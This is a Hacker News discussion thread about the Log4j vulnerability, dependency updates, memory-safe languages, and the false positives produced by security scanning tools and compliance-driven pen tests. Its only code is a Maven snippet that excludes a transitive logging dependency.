Or you just do it manually if that service is down. It's weird to me that the argument for not having an automated, 3rd-party service is "if it goes down then you'll have to do things manually", when the alternative is "you always have to do it manually".

If you are comfortable trusting a third-party service to tell you when to upgrade, then that is absolutely an improvement over doing security updates manually. This is why I have unattended-upgrades set up on my Debian systems to automatically install updates from Debian Security every day. Sure, it may fail for whatever reason, but I am certainly not going to take the time to (or even remember to) update every day.

staticassertion · on July 20, 2022

Yeah, honestly there's probably just a few libraries you're going to have to care about re: keeping up to date. Everything else can get updated opportunistically/ on some cadence. Your exposed attack surface for most software is pretty much your TLS library and network stack. The more mature you become the more of the attack surface you can try to track.

But basically if you just subscribe to a few projects' releases you can pretty easily get things pushed to you when it matters.

shepherdjerred · on July 21, 2022

Oh I completely agree. I was referring to the parent saying that a third party is dictating what to build -- for security this is inevitable. For dependencies this can be solved by caching your .jars or whatever, but at some point you still always have a third party dictating what you're building.

philosopher1234 · on July 20, 2022

Not Go

mrcarruthers · on July 20, 2022

Still Go. I mean there's no central repository in the way there's one for npm, and yes you can point it to any git repo as the source for your dependencies, but the reality is most are on GitHub. So your central repository is GitHub.

shepherdjerred · on July 21, 2022

Can you give me an example of a popular Go project that doesn't have any dependency on GitHub?

phendrenad2 · on July 21, 2022

Isn't that just software though? If you fix bugs in your code, you'll introduce new bugs. If you don't fix bugs, you'll have bugs.

overgard · on July 20, 2022

Ok, so what is the solution then? To me there isn't one. It's like, how do you prevent all car accidents? The only way would be to ban driving.

skjoldr · on July 21, 2022

>So, should this be a manual process where I have to dig through obscure warnings every time I build something?

Also known as doing your job.

jsiaajdsdaa · on July 20, 2022

Better idea: stop logging.

craigching · on July 20, 2022

Ironically, logging is one of the ways to help mitigate/detect security vulnerabilities.

MilStdJunkie · on July 20, 2022

It's not just logging. L4J is so extensible that people have used it for all kinds of things, way waaaaaayyyyy away from just logs. So disabling logs won't necessarily cut it.

I am no expert. I ended up indexing all the open source kruft I use to hold this ship of fools together, then verified that the Log4J pieces were definitely disabled with a bunch of monitoring while I tossed stuff at it. I did mention I am not an expert, right? I am sure there is a more Pro way to do this.

jsiaajdsdaa · on July 20, 2022

F around and find out basically. If you choose to build on the house of cards, thou repeath whaet thou soweth or something.

ClumsyPilot · on July 20, 2022

problem: food contaminated

solution: stop eating

jsiaajdsdaa · on July 20, 2022

solution: find uncontaminated food, or make it yourself

ClumsyPilot · on July 20, 2022

option 1 - we and farmers, as professionals are responsible for supplying stuff that is not dangerous and works as it should

Option 2 - which you are advocating - it's every man for himself and we decent into socity of warring tribes of hunter hatherer or subsitence farming at best

jsiaajdsdaa · on July 20, 2022

option 2 is the only possible state of reality, because it is never possible to guarantee that everything work in every instance

let the buyer be aware

paulmd · on July 20, 2022

I mean, how do you know your webserver doesn't have a bug? How do you know your OS doesn't? Just write those yourself? How do you know yours doesn't? One must still verify the key functionality regardless.

But, you're not wrong, some people reach for every library and framework they can, and others focus on building the most minimal and understandable thing that will work. I'm not saying writing your own server in assembly, but, avoid unnecessary junk and magic and libraries.

It's the classic dilemma: in this world of ours, one can either return to monke or progress to crab.

throwaway23234 · on July 20, 2022

the issue is that this can pop up in any library, not just logging. It's about keeping your deps up to date (or not) by a "3d party" (assuming he mean 3rd party)

staticassertion · on July 20, 2022

Yes, this can pop up in any library. But only because developers aren't taught "don't put remote code execution into your code". You'd think that would be something that someone would teach, but it doesn't really come up. Remember that log4j was vulnerable because of a feature - it all worked as designed.

wyager · on July 20, 2022

> The current software engineering paradigm has no meaningful answer to this

The answer is to stop using garbage software written in garbage languages. Of course the current environment is too high-time-preference for this to be economical in many industries.

We have lightweight-to-heavyweight formal systems which can almost completely or literally completely eliminate issues of the type seen with log4j, but due to the marginally higher up-front cost of using such systems, only firms with some combination of high stakes, low time preference, and foresight end up using them.

throwaway23234 · on July 20, 2022

What counts as a garbage language? Java guys will tell you it's rust or go, go guys will tell you it's java or rust, rust guys will tell you it's java and go.

recursive · on July 20, 2022

> What counts as a garbage language?

I assume it's one with GC.

joebob42 · on July 20, 2022

Wouldn't it be one without gc? Gc collects the garbage and disposes of it, whereas in other languages it just piles up :D

EdwardDiego · on July 20, 2022

Java person here. Yeah, Go looks a bit crufty, but they're gradually undoing the earlier opinionated choices that make me think that (Who needs generics? Who needs to tune the GC? Oh, our users do), but nah, we mainly hate on Scala when we have to maintain anything with Scala deps, just that damn ABI that's never compatible.

wyager · on July 20, 2022

I'm not any of those guys, and of those 3 rust is by far the least garbage. Garbagicity is a spectrum.

shikoba · on July 20, 2022

I was sure reading your first post that you will propose rust. Rust users never cease to amaze me.

wyager · on July 22, 2022

I'm not a "rust user" any more than I'm a java user (less, in fact). Your heuristic is probably picking up on the fact that people who pay attention to things like this tend to have correlated opinions.

sebzim4500 · on July 20, 2022

To be fair there was also a significant chance he would think Rust was garbage and only assembly (or if you are lucky, C) are acceptable languages.

shikoba · on July 21, 2022

You still don't know how to spot them :). The borrow checker is a great invention, but for them it's the holy grail that will save us from bugs. Like in the past people thought that GC was the solution to every problems. Youngsters must learn, we have to be patient.

ClumsyPilot · on July 20, 2022

'software written in garbage languages'

well, back to the mainframe it is then

gnulinux · on July 20, 2022

Quite the opposite, we have very safe languages now in 2022. Any software that's not written in Rust or Haskell has to explain the trade-off of being written in an unsafe language. Of course the industry will still use unsafe languages, but we lack the awareness that we're intentionally writing garbage software in garbage languages that should be treated as radioactive material in any context where safety matters. If you pick a language without understanding this point, you're part of the problem. If you pick an unsafe language understanding that X matters more than safety, then you saw all of this coming and you made an educated gamble.

stonemetal12 · on July 20, 2022

These Log4j issues aren't real hardcore exploits. They wrote a logger that could run arbitrary code, then were surprised when attackers figured out how to run arbitrary code.

It isn't a language problem, it is a developer practices problem. Developers code like security isn't a thing then are confused when their programs aren't secure.

kelnos · on July 20, 2022

> It isn't a language problem, it is a developer practices problem. Developers code like security isn't a thing then are confused when their programs aren't secure.

I'd prefer that the "fix" for this isn't "require that millions of developers around the world all change their behavior, and never screw up in the future".

Languages can still protect against these sorts of bugs. Effect systems can describe as a part of the type system or function signature what kinds of things a function can do. For example, you could have a logging function where you know that the only side-effect is that it can write to stdout or stderr, or a file. Running arbitrary commands would not be allowed, and would cause the program to fail to compile.

As a real-world example, I've used the Slick SQL library in Scala, and the query type has a type parameter for whether the query is an read or a write. It's easy to build a simple abstraction on top of your data layer to never allow a write to go through, for example, if that's something that's useful to prevent bugs. I think one thing I did with that was set things up so callers could not accidentally write to MySQL replicas; only reads could go to them, and writes had to go to the primaries.

Granted, it takes discipline to build and use such a system, especially one that has such fine-grained effects. (I would expect most are more like a binary "does not do I/O" or "does I/O".)

stonemetal12 · on July 25, 2022

The issue is like SQL Injection. Much like SQL Injection protection the logger needs to separate "active" strings vs attacker controlled "data" strings. It is pretty easy to design boring Java types that solve the issue. The only problem is they didn't. Unless this effects system somehow forces them to not do something dumb, we will end up with a logger that has effects set to "does everything under the sun", and a similar bug.

alcover · on July 20, 2022

  It isn't a language problem

Exactly. This flamy sub-thread has no point here.

ClumsyPilot · on July 20, 2022

We've had safe lnaguages for decades - for example Ada

https://www.adacore.com/about-ada

paulmd · on July 20, 2022

In what fashion does Rust prevent you from calling valid library code that has unexpected behavior?

jacobyoder · on July 20, 2022

Had to deal with some automated scan tool telling a client "you have log4j - you're vulnerable!" when... we didn't. A project was including a dependency on SLF4J and that project pulled in slf4j-log4j (IIRC). But it was not configured, wasn't compiled in to the final jar, and ... even it was, it was very old log4j (1.1 or 1.2 IIRC?). The vulnerability didn't affect that older version.

We had to spend a week back and forth with

"no, we're not vulnerable".

"But we see log4j is right there in the a file in the directory".

"No, it's not vulnerable and it's not being used and we can't reasonably fork the entire dependency just to remove that one sub-dependency from our project's dependency"

"But we see log4j is right there in the a file in the directory".

Also, there was no budget to do any sort of rewrite/refactor/etc anyway.

dspillett · on July 20, 2022

> We had to spend a week back and forth with

We've had similar out of a pen test that noted we were using nginx for some of our internal dashboards/tools and the version running (1.18 IIRC) was officially EOLed upstream so a high security issue.

They initially wouldn't listen to the argument that we use stable/LTS Debian/Ubuntu release only, and those hold functionality stable (which is one of the key reasons to use them) and backport security updates where relevant. We pointed them at the package changelogs and they were convinced that there was still a vulnerability not patched but for some reason didn't want to tell us which, when we finally got that out of them it turned out to be one that was introduced in a later version so was never relevant in the first place for the one the stable repositories included.

You would think a penetration testing company would have a clue about something so common…

raesene9 · on July 20, 2022

If it was an unauthenticated test, I'm not surprised. Raising findings off of banners is notoriously error prone, but pentesters often err on the side of raising things that are dubious rather than leaving them out.

If it was a credentialed review, you'd have hoped their scanners would plugin to the appropriate debian/ubuntu security database and give you a less false positive prone set of findings (although with debian based stuff you still have the problem of scanners reporting the "unfixed" set sometimes)

Nursie · on July 20, 2022

Been in similar situations, it is not fun.

"You have a vulnerable version of netty"

"No, we don't, that's a false positive"

"No see, the tool says you need netty 4.x and that's version 1.x, you need to update"

"OK, but the tool is wrong, it's just picking up anything with 'netty' in the name, and that component is a wrapper around netty for some other thing, it only goes up to 1.8"

"You have to update it to 4.x, this is a vulnerability"

"Do you understand this isn't part of the thing you're concerned about"

"I am only concerned about shipping a product without vulnerabilities"

"Well this isn't one, because it's a false positive, here's the CVE, here's what it applies to, here's the link to this package on maven central, it's not part of netty, back off"

"But it's insecure, the tool says so"

We went round and round for about 3 hours until I told the guy (an infosec 'pro') to leave me alone until he'd figured out how to do his job... he came back to me the next morning for another 3 hour slack argument along the exact same lines at which point I told him to leave me alone permanently and communicate through management if he had anything to say. I'm not massively impressed with infosec as a profession after a few similar encounters.

d4mi3n · on July 20, 2022

Security engineer here. This is sadly common. The grim fact seems to be that we have a dearth of information security analysts with engineering experience. If they don't have "Engineer" or similar in their title, odds are they haven't had the pleasure of building or maintaining a non-trivial unit of software over more than a quarter or so.

That said, I've seen the inverse problem: engineering staff that either don't understand how their dependencies are managed (not unreasonable for less experienced teams, NPM for example has a tendency for huge dependency trees and this can be a hard problem to manage for a big project) or whom are for a plethora of reasons incentivized to push back on requests for work they don't perceive as important.

The middle ground here requires trust between both parties (InfoSec and Engineering org functions). Sadly, not all security programs are well managed and not all engineering teams have mature practices.

If you have time or capacity, you can get a lot of leverage here by educating your security analysts on how your technology works (e.g. how the build system functions, how your languages of choice share and bundle code). Trust can be built between engineering and infosec teams by educating where possible. Done well such practices can up-level both sides of these discussions and save you stress in the long run.

tetha · on July 20, 2022

This is for example why we, as a company, rather took 2 hours to escalate Log4Shell internally. Which was like 2-3 hours before it went globally holy shit.

We took the time to analyze the vulnerability, and multiple competent people concluded: Yup. This is serious. Then we figured out plans, mitigations, and communication paths to update the plans and mitigations together with ops, dev and other folks. And then we shoved all of that as a large document into the larger technical organization as "Holy fuck the sky is falling, start patching, here's how to see when you have to, here's how you do. Go".

And that's also something I'm currently telling our new full-time security engineer. Be a bit mindful in the communication of criticality and vunlerability. Like, with my team of admins and SREs, you can be like "We're all doomed" and someone will be "but we don't deploy that feature, calm down. Would you like some tea? What evil thing did the CVE say to you?". Or they might escalate accordingly, if it looks bad to them, too.

But if you do that to most of our dev-teams? That'll be just an unstructured mess, which will be worse than waiting a moment to structure a proper response to the threat.

Nursie · on July 21, 2022

> Trust can be built between engineering and infosec teams

Yes it can, and I have worked with 'good' infosec people who were all about improving practices together. That attitude goes a long way - developers (well, the good ones) want to ship secure stuff and want to fold in best practices.

But the profession is unfortunately rife with people who don't know as much as they think they do, and who wade in heavy-handed, laying down the law to developers who might have been round the block once or twice themselves...

I wonder if it wouldn't be better to have a hybrid role that is part of engineering but has specific responsibility in this area, rather than as is often the case, an external party (or a separate team) which is perceived as adversarial.

d4mi3n · on July 21, 2022

Some organizations do do this and they call them product security engineers or similar. Sadly, this doesn’t remove the need for an informed organization at large—that function covers a lot more than securing code—but it’s absolutely something that has been done.

There is one caveat however: you’ll probably still need dedicated security analysis or security engineers outside the chain of command of your product or engineering org.

There is a degree of necessary opposing pressures and incentives for infosec departments vs product departments: product organizations are rewarded for shipping more. Infosec organizations are rewarded for preventing incidents.

The most common result of this contention are situations people often lament in the comments here—security programs that are either ineffective, heavy handed, or both.

In my mind, a good security program positions itself as an enablement function and should strive to educate and inform over all else. People close to the work will be best positioned to make decisions about effective ways to harden their systems when informed of likely risks, requirements, or other security considerations.

With any luck this minimizes the need to mandate security motivated changes and changes they dynamic when your local security professional comes by with specific concerns. It’ll be less of “the sky is falling” and more of “we saw this specific problem and would like to work with you to fix it”.

BrandoElFollito · on July 20, 2022

I run a security team in a large company.

What you described is usually the result of some "consulting company" (in our case big ones) that drop stuff with zero actual knowledge.

Every year we "review" these with the board and it is annoying as fuck.

Recently they got a new manager who understands we are in the same boat. They have to provide a report with some findings and I need to have a secure environment. We talked this over and suddenly the board presentation was cool.

As for internal teams, I have a few extraordinary people. They are very young and I had to coach them on how the vulnerability is actually critical or not depending on the context, data, etc.

So not all cybersecurity teams suck :)

d4mi3n · on July 20, 2022

Hi! Question from a fellow practitioner: What tools or processes do you and your team use to identify false positives in such scans and reports? How do you track out-of-band mitigations against real-but-unreachable vulnerabilities that have been identified? e.g. A WAF set to intercept requests that trigger a specific vuln, or network segmentation to limit the scope of a moderate vulnerability.

In my experience tuning out false positives and other noise is fairly straightforward when you're only looking at CVEs, but things rapidly break down when you're trying to prioritize work with limited resources (only so many security engineers and engineering teams with spare cycles on their roadmap).

I have yet to find a good solution here other than manually whitelisting specific vulns in some kind of tracker and reviewing them whenever the network topology or configuration for an application changes.

Curious to hear your experiences, though I suspect this is a common and difficult to solve problem.

BrandoElFollito · on July 21, 2022

Well, this is a real circus.

I have tested and deployed several scanning tool (and have contributed to nessus some years ago - their scanning capacities were really mediocre compared to the precision of the results. In out 100+k IPs on 10.x networks the time to scan was horrendous. But once an IP was scanned, the results were fine). A small disclaimer: I use several solutions but have no stakes in any of them (neither company nor personal). I have build relationships with them that helps me to provide substantiated feedback that sometimes event get taken into account :)

There are several issues, none of them has an automated way of fixing.

First there is the criticality of the finding. We found that often (especially on Linux) you will get a "raw" critical issue on a component that was not patched; And why it was not patched? Because the vendor set a low level. It is then that the discussion between the security team and the OS one starts - I have experimentally found that the vendor rating is usually better because they take into account the actual context of the deployment, especially for libraries.

OTOH crowdstrike vulnerability rating (I forgot the name of the component, it is on top of the EDR) is actually two ratings: the CVSS-reated one, and their own where they look at actual exploits and deployment. I have decided that critical+critical = actually critical that must be patched no matter what. This is the only way I found to quantitatively auto-decide on important patches. The goal is of course to patch everything but the reality is that there are so many loose ends in products that fighting for anything below the top two levels does not make sense.

The very sad thing here is that this is perceived as an issue of the OS/middleware and not the shitty products vendors deploy. They use some undocumented or weak solutions and then cry when everything breaks down. I develop myself (amateur developer) and have never had any issues for 30 years when upgrading the OS because I actually care about following the docs.

The second problem is that today products have nested dependencies. For our own products we do an awfully time taking and precise review of the actual impact on the product but this is because people actually care (this is not my team so I ma not taking any credit - I just like their approach). When a customer comes with a question we have a comprehensive response. This works or not, some people when they see "vulnerability" they stop at that and want that word to disappear.

When we are on the receiving side of such products (and log4j is a perfect example), we ask the vendor. If this is open source the answer is usually very good, there are some github/gitlab issues that address the point. Commercial vendors are much worse because they either say "no worries" or take weeks to respond. When a "no worry" comment comes from a company that cannot explain why they limit their passwords to 27 characters, it is worrisome - a bit like when my children say "no worries" (this is the moment when I start to worry).

Scanners are quite slow to respond to non obvious vulnerabilities (the ones you cannot easily tag though OVAL). For log4j for instance I coded a scanner/reflector on the night of Thursday (the information popped up about noon on Thursday western europe time). The scanners followed up after a week, but one could fine good ones open source quickly as well. So my advice would be to closely monitor GitHub for such tools when there is pressure (we switched to another tool for log4j when my team and the OS ones were successively finding better ones). This also led us to investigate a fantastic tool/framework to write scanners, which name escapes me right now but I can comment here when I am back from vacation and get hold of the gal who is looking at that.

The TL;DR version is that

- a few tools provide a way to quantify the risk (that's a huge slit but the best I can do) - at least there is a reasonable chance that you will not miss the worst ones

- GitHub activity when shit hits the fan is extraordinarily useful - the best tools emerge there, before the vendors catch up

- vendors are medium, but is is not as bad as you read

- your CISO should make the effort to communicate that there will be availability issues when the IT/security team decides to switch off a key component (say - email) if this presents a risk for the company. I have the chance to have a CEO who not only understands this but actually challenged me once to why I did not cut earlier. Having that arranged upfront talks a huge stress off the security team.

- and finally the sad reality is that the vast, vast majority of issues we get are from users who click on stuff

I am sure I forgot a lot - let me know if I can help with some details.

d4mi3n · on July 21, 2022

Thank you for the fantastic response, I always enjoy seeing how folks approach these problems. Your points about inconsistency between how vendors vs OS distributions handle things is well taken and mirrors some things I've seen.

Please do feel free to reach out via email or LinkedIn (deets in my profile), always a pleasure talking shop with folks in the industry.

Cheers!

commandlinefan · on July 20, 2022

I sometimes feel that my job description could be "arguing with people who feel passionately about something they don't understand".

harveywi · on July 20, 2022

Man: What is the secret to eternal happiness?

Guru: To not argue with fools.

Man: I disagree.

Guru: Yes, you are right.

BrandoElFollito · on July 20, 2022

Like I usually say, everyone is a doctor and a football coach, and recently a security expert.

I am coming to a point in my 25+ years career where I stopped to argue. I just tell them that they are wrong but I do not care until they put the company on danger.

Unfortunately this leaves me with fat powerpoint presentations which well to be the modern documentation of a company.

d4mi3n · on July 20, 2022

Many advisory jobs fall into this bucket. I'm of the impression that anybody who reaches senior/staff+ roles end up doing this as part of their day to day.

dylan604 · on July 20, 2022

Isn't that just a description of life in general?

commandlinefan · on July 20, 2022

Not for the people who are arguing with me.

raesene9 · on July 20, 2022

Over-reliance on tools is a bad problem in Infosec, often due to the range of areas they have to cover. That said a good infosec person should always have an understanding of where their tools are limited, so they can work around those deficiencies.

mbreese · on July 20, 2022

It sounds like some of this should be automated. If all the infosec person is doing is running a tool against a repo and reporting results, that should be automated. When there are false positives, that should be annotated in the repo with multiple people checking off on it.

I’ve been impressed by automated bug checking tools in the past and I see this as part of the same issue. I don’t see why this would need an FTE to run code against a tool. CI should be enough.

dboreham · on July 20, 2022

It's the "intelligent life form determines the alert is a false positive" part that's not automated.

mbreese · on July 20, 2022

Of course that’s not automated.

From the parent, it sounded like the their issue wasn’t figuring out if something was a false positive. It was that another “intelligent life form” ran a tool and then wouldn’t accept when another “intelligent life form” assessed that a flag was a false positive.

If the infosec person is just running a tool and reporting results, why are they part of the loop? Make running the tool mandatory for each git push back to the main repo. Then, if/when there is a false positive, allow them to pass if they’ve already been “approved” by some means (like a .infosec_ignore file).

Nursie · on July 21, 2022

In this case they weren't even running the tool, just looking over reports generated by the dev team.

dboreham · on July 20, 2022

Same experience several times. Tool picks up examples code dependencies from our dependencies is another form of this.

Natsu · on July 20, 2022

This is where you could probably just have renamed the file.

hedora · on July 20, 2022

Once you realize this sort of shallow, automated audit exists to grease the wheels of some security theater operation, this sort of back and forth makes sense.

False positives don't waste the security team's budget, and are the only surefire way to justify ongoing expenditures on the scanning tool.

tekchip · on July 20, 2022

So somehow false positives negate all the actual positives caught and corrected? The only true solution is what? Manual audit of everything by some perfect human security practitioner? I suppose the same applies to automated development tools then.

I will concede there probably are some firms out there acting poorly that way. When aren't there? Humans sigh. But by in large automation and the problems inherent are required.

horsawlarway · on July 20, 2022

I was in this industry for a while (I did 5 years full time for a security company).

> I will concede there probably are some firms out there acting poorly that way.

This is a hilarious take. Here's mine: The vast majority of these firms are here for liability. They do not provide security, they provide security theater so that if/when something goes wrong, the client can claim to have followed best practices, and that it's not their fault.

This style of theater is RAMPANT in the industry. Literally most of them come in with some version of a shitty automated tool, often with false positives in the 95%+ range, and then you check off checkboxes to make legal happy, and ensure that your insurance (or your customer's insurance) will pay if you get compromised.

This is not limited to small companies, but is instead mostly how large banks, credit firms, and large enterprises work.

The entire damn show is for liability, and half of these "Security professionals" can't do anything other than read the message coming out of their tool. They are utterly incompetent when it comes to applying logic to figure out whether a specific use of a "risky" tool/language feature a genuine problem, vs a god damned fucking regex match from their tool on something completely unrelated.

I went in as a naive young dev, I came out with ZERO respect for this industry, and a healthy dose of skepticism around anything these folks are saying.

Security researchers? Generally fine (although there's a new breed of them that simply submits inane non-vulnerabilities over and over to attempt to get bug bounties from large companies)

Security advice from open source devs? Generally top notch, listen to it.

Security advice from that contractor your company paid? Expect to have 95% false positives, and they'll miss the 2 places you know actually have issues. But it's ok because you'll check all the boxes on their sheet and legal is happy.

---

I'm waiting for insurance companies to wise up and stop covering companies who are breached. Prices are already shooting way up, since it turns out security theater does a very bad job stopping real threats, and that's what this industry is right now. Might was well be the TSA of software, gonna frisk you real good, and then flunk every fucking test.

beAbU · on July 20, 2022

My project's client, a major local bank, mandates pen testing before we go live with the product that we're building.

Due to time and resourcing constraints, and a fixed launch date (don't ask), we had to significantly reduce scope. We are currently launching with probably 30% of the original scope. Once live we'll iterativley add features and grow our product to bring it back to the original vision.

Will we have to do pen testing again in the future? Nope. Even though a lot of our planned post launch features involve integrations with 3rd parties and the exchange of sensitive personal data.

Pen testing is 100% a box ticking exercise in my opinion. And most of the shops that offer this service are set up to provide the service such that large corporates to appease legal.

I really don't like pen testing as a practice and seriously dislike when it's a go live impediment.

rtev · on July 20, 2022

What you’ve described is an issue with the bank’s procedures, not pentesting.

pas · on July 20, 2022

> I really don't like pen testing as a practice

could you elaborate on this a bit? what's wrong with it? to me it seems the only logical thing to spend external security budget on. (or internal red team if the company is so bit it can afford it.)

kriro · on July 20, 2022

Thank you, that is a very interesting take. I've always played with the idea of pivoting into the security industry because playing hack the box and the like is something I do in my free time and enjoy. Maybe I'll just do some bug bounties or something for fun instead. I think it's a bit different in Europe though at least anecdotally there seems to be more code audit and the like (more product security) instead of pen testing (more network/infrastructure security).

ylk · on July 20, 2022

I'd say don't let yourself be discouraged by GP. Just look into a company before you apply. Many have public reports and/or security research, both of which you could use as indicators.

Here's a repo with lots of public reports by various consultancies, you could use that as a starting point: https://github.com/juliocesarfort/public-pentesting-reports

freeqaz · on July 21, 2022

This post is amazing. Thank you. This captures my thoughts on this problem space very well!

Security vs compliance is real. I love how you just map "compliance = security theater" because that is really the best way to describe it. The TSA bit has me in tears!

spc476 · on July 20, 2022

Back in the late 90s, I was working at a small web hosting company (take note). One day, a 500+ page report of a recent PCI compliancy check landed on my desk. It was nothing but "OMFG! DOMAIN1 RESPONDED TO PING! YOU WILL BE PWOWNED! OMFG! DOMAIN1 HAS DNS RECORDS! YOU WILL BE PWONED! OMFG! DOMAIN1 HAS A WEB SERVER RUNNING! YOU WILL BE PWONED!". Over and over again. For every domain we have. Complete and utter garbage report.

Better---just summarize the IPs scanned and report back which services were found running on said IPs. Then in an appendix, list why each service is (or might be) problematic. "Ping? Attackers might be able to figure out your network topology and that is bad because blah blah blah blah."

But 500 pages of this automatic breathless garbage? Utter trash.

paulmd · on July 20, 2022

The problem isn't that audits are inherently worthless, it's that most of these tools are very low-quality implementations of the concept.

In one of my past jobs I was an early-mover on doing a lot of our ops on Linux and the audit tools had no concept of the backport security model whatsoever. If you were running on some kind of LTS distro rather than a current distro, it would see "gosh you're 3 minor versions behind, you have a ton of unpatched vulnerabilities!", but in actuality you didn't, because the fixes got backported into security releases (the "31" in something like "3.1.22~ubuntu31" for example). But the tool was dumb and it just had a table that said "anything under 3.4.14 is vulnerable" even when it wasn't necessarily.

OP's "log4j 1.x is not vulnerable to this the first place" is a similar thing where either someone forgot to put in a value for "min vulnerable version" or the tool doesn't understand the concept of min-version at all. To be fair that can be genuinely tricky in java, best-case you are reading manifest files to try and pick out a version, but some legacy stuff doesn't have manifests, especially very legacy fat-jar stuff. Yes, that stuff didn't go away, it's still out there in places!

And to be clear this was a long-running issue... it wasn't a "oh our tool doesn't understand LTS, I get it" and they left me alone... this was every month they'd be back at me for a new list of utility vulnerabilities even though I repeatedly explained to them that I had set up apt-get to auto-upgrade every night and reboot, so we were running whatever the latest security backports were available, and that just like the last 10 times this was even more false-positives.

And again, this isn't just "we have to run it by you no matter what" and they leave you alone either. What security really wanted was for me to run windows and manually install the updates and get back in line with everyone else, even though that would have been a less secure outcome than my locked-down linux boxes. But this wasn't my day-job at the company so to speak, it was helping out another project with some ops and it needed to be as low-effort as possible (and to be fair their requirements weren't steep, auto-patch-and-reboot was fine by them and never caused any breakage during my tenure there).

The root problem is that these sorts of tools aren't a substitute for an actual security culture, they're often a symptom of a compliance requirement and the whole thing turns into a box-checking exercise. Someone is on their ass about this because of contractual requirements or PCI requirements, and they bought the cheapest thing off the shelf that would check the box, and they are implicitly showing you here that they don't even understand how to interpret the output of that.

horsawlarway · on July 20, 2022

> The problem isn't that audits are inherently worthless, it's that most of these tools are very low-quality implementations of the concept.

I think the problem is that the current audits are inherently worthless. I've never seen another industry that would accept a 95% false positive rate from a tool. But that's on the low end from my experiences (I've done 4 major codebase audits, and worked in the security industry for 5 years)

Tools that routinely spit out 1000 plus vulnerabilities, and 6 months later you've checked off all of them without a single valid vulnerability in the list (but 3 you found yourself during that time that were missed entirely by the shitty regex that is really the entire tool in question).

bostik · on July 20, 2022

> current audits are inherently worthless

And that's not helped by the warped incentives. Security has to be, fundamentally, assessed as a holistic thing and even highly skilled technical people can't really do that with modern systems. Now you add in auditors, a profession populated by glorified accountants, working off of gargantuan checklists.

You invite and reward mediocrity. At best.

Anyone good enough to actually understand and able to work with the technology will find a job in the industry, for twice the pay. And the same applies to regulators. They can't retain technically skilled staff, so they are filled with accountants. As a result we get rules and regulations, written by technically incompetent accountants, aimed at technically incompetent accountants.

To fill the gaps we have shitty, false-positive ridden, noisy, outright useless tools that generate reports intended to satisfy accountants. Security has next to nothing to do with that.

And to top it off, we have an entire industry riddled with so-called security engineers who know how to run a tool (with some marginally helpful StackOverflow pointers) and export a report, but can't for their life actually interpret, let alone VERIFY, any of it.

That has as much to do with security engineering as burning ants with a magnifying glass has to do with biology.

hedora · on July 20, 2022

You could set your build up to not auto-download questionable stuff from untrustworthy machines on the Internet.

cmckn · on July 20, 2022

> we can't reasonably fork the entire dependency just to remove that one sub-dependency from our project's dependency

If you use Maven, just exclude that transitive dependency from the explicit dependency.

But yeah, dumb warnings are dumb.

  <dependency>
    <groupId>com.example</groupId>
    <artifactId>my-dependency</artifactId>
    <exclusions>
      <exclusion>
        <groupId>org.slf4j</groupId>
        <artifactId>slf4j-log4j12</artifactId>
      </exclusion>
    </exclusions>
  </dependency>

EdwardDiego · on July 20, 2022

Bingo.

bostik · on July 20, 2022

We (read: I) face this on an ongoing basis.

We can't upgrade the entire components that bundled up log4j for various reasons, starting from licensing rules. So we made the decision to strip out the entire JndiLookup class from every project that uses java. Clients do various scans, and rely on dumb version string matching and/or banner grabbing. We have to routinely point them to our VERY detailed and explicit log4j response document, and carefully explain to them that their scanners are relying on insufficient detection methods.

Security teams are quite content with us giving them detailed explanation about the false positive. And then they forget or deliberately choose to ignore the lesson and the next time they run their scans, get the same false positives again.

Even supposedly state-of-the-art security tools, to this day, refuse to actually verify their detections.

dotnet00 · on July 20, 2022

I recall that NVIDIA had to release an update to their CUDA Toolkit around when the Log4j vulnerability was announced. They weren't using it but the file was being distributed, presumably for a similar reason. I'm guessing they might've had similar complaints coming in.

plmpsu · on July 20, 2022

Configure your build tool to exclude the transitive dependency.

allochthon · on July 20, 2022

Typically there's a way to suppress specific warnings in systems like these. In your company's situation, I would look at moving away from a scanning system if it didn't allow overrides like this.

alfalfasprout · on July 20, 2022

So far this is the best approach I've found. The scanning tools rarely include that ability but if you build tooling around them you can maintain exclusion lists, for particular vulnerabilities, library/version pairs, etc.

Unfortunately it does mean there's no getting around having someone manually deal with false positives.

MilStdJunkie · on July 20, 2022

Yup, that's us. Same deal exactly. They already stoppered our entire team for eight months with a tools audit a few years ago, so I hung that dead fish above the conversation when this came up. "Uh, ok, don't want to do that, sooooo . . recommendations?" "Let's isolate it, toss stuff at it, and see if it lights up" "Sounds good to me. FIXED"

thayne · on July 20, 2022

I thought Log4j 1.1 was vulnerable, just to a lesser extent, and there wasn't a lot of information on it because 1.x is end of life

Natsu · on July 20, 2022

EOL libraries are themselves vulnerabilities. It's not really good to even have this reachable on the classpath, in cases like the grandparent, you should look at removing the class from inside the JAR (or removing the JAR itself) if possible to ensure that the vulnerable code cannot get called under any circumstances.

hyperman1 · on July 20, 2022

See https://logging.apache.org/log4j/1.2/ . Plenty of vulnerabilities. Just different ones

bragr · on July 20, 2022

Log4j 1.x is vulnerable, but to different things and not as badly.

cesarb · on July 20, 2022

> Log4j 1.x is vulnerable, but to different things

And the most common use of log4j 1.x (logging to the console or to a file, with a simple configuration) uses none of the vulnerable parts.

Danidada · on July 20, 2022

Someone said "hey log4j 1.2 wasn't that bad" after the log4shell vuln and came up with the idea of reload4j which is just log4j 1.2 but with its known vulnerabilities, bugs and performance issues fixed. Complete feature freeze besides that. Considering that a log tool shouldn't have that many features and that log4j 1.2 was being used by a lot of companies (just see maven central stats) there is no need to add more features to reload4j, which I find kind of cool

sporkland · on July 20, 2022

Log4j-api isn't vulnerable and the slf4j-log4j bridge depends on it. Log4j-core is. All of our internal security scanners failed to make this distinction so we had to post filter ourselves.

WesolyKubeczek · on July 20, 2022

Sometimes people ask me why I'm so skeptical about software delivery techniques involving bundling and static compilation. This is a thing that people sometimes ask.

0xbadcafebee · on July 20, 2022

It's funny how every Go project seems to statically compile in the same libraries. If just one of them has a serious vuln, we're talking nearly every Go project in the world having to be patched and recompiled, or upgraded with potentially breaking changes. And as we know from Log4j, that can be incredibly difficult. Just finding all the affected Go apps will be a nightmare, and patching will not be as simple as "replacing a jar in a zip file".

cesarb · on July 20, 2022

> Just finding all the affected Go apps will be a nightmare

This isn't even a new situation. We had the exact same problem some time ago with zlib: it was also embedded everywhere, and just finding all the affected apps was a nightmare. It's the reason most Linux distributions came to deeply dislike bundling libraries, instead of using a dynamically linked shared copy from a separate package. Unfortunately, it seems the lessons from that zlib incident are being forgotten, perhaps because too much time has passed (IIRC, in the order of decades) since then.

kelnos · on July 20, 2022

